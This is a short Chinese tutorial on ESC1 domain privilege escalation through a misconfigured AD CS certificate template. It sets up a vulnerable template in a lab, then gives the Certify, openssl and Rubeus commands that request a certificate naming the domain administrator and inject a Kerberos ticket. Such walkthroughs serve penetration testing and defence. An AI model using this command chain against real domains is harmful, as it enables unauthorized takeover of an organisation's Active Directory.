AD CS Tradecraft ---域提权 ESC1

一、错误配置的证书模板 ESC1

1、先检查有没证书配置错误

工具下载地址:https://github.com/GhostPack/Certify

如下的证书配置:
1、我们需要有权限去获取证书
2、能够登记为客户端身份验证或智能卡登录等
3、CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT开启

2、配置环境和危害检测

我们首先创建一个具有以上3个点的证书模板，使用certtmpl.msc创建。我们复制工作站身份认证模板，在常规中修改模板显示名称为ESC1，扩展中的应用程序策略中加入客户端身份认证

在安全中加入Domain Users具有注册权限：

在使用者名称中，选择在请求中提供，也就是开启CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT。

然后使用Certsrv.msc，发布我们创建的危害模板

然后，使用certify,检测危害

Certify.exe find /vulnerable

3、ESC1利用

Certify.exe工具有1个DLL依赖，需要复制到同目录下。

获取证书，注意altname参数，这个需要填的是域管用户名。

Certify.exe request /ca:dc.test.com\test-DC-CA /template:ECS1 /altname:administrator

然后算换pem到pfx，不要输入密码

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

然后使用Rubeus获取TGT。
工具下载地址:https://github.com/C-Sto/Rubeus

Rubeus.exe asktgt /user:administrator /certificate:C:\users\ca\desktop\cert.pfx /dc:10.0.0.200 /ptt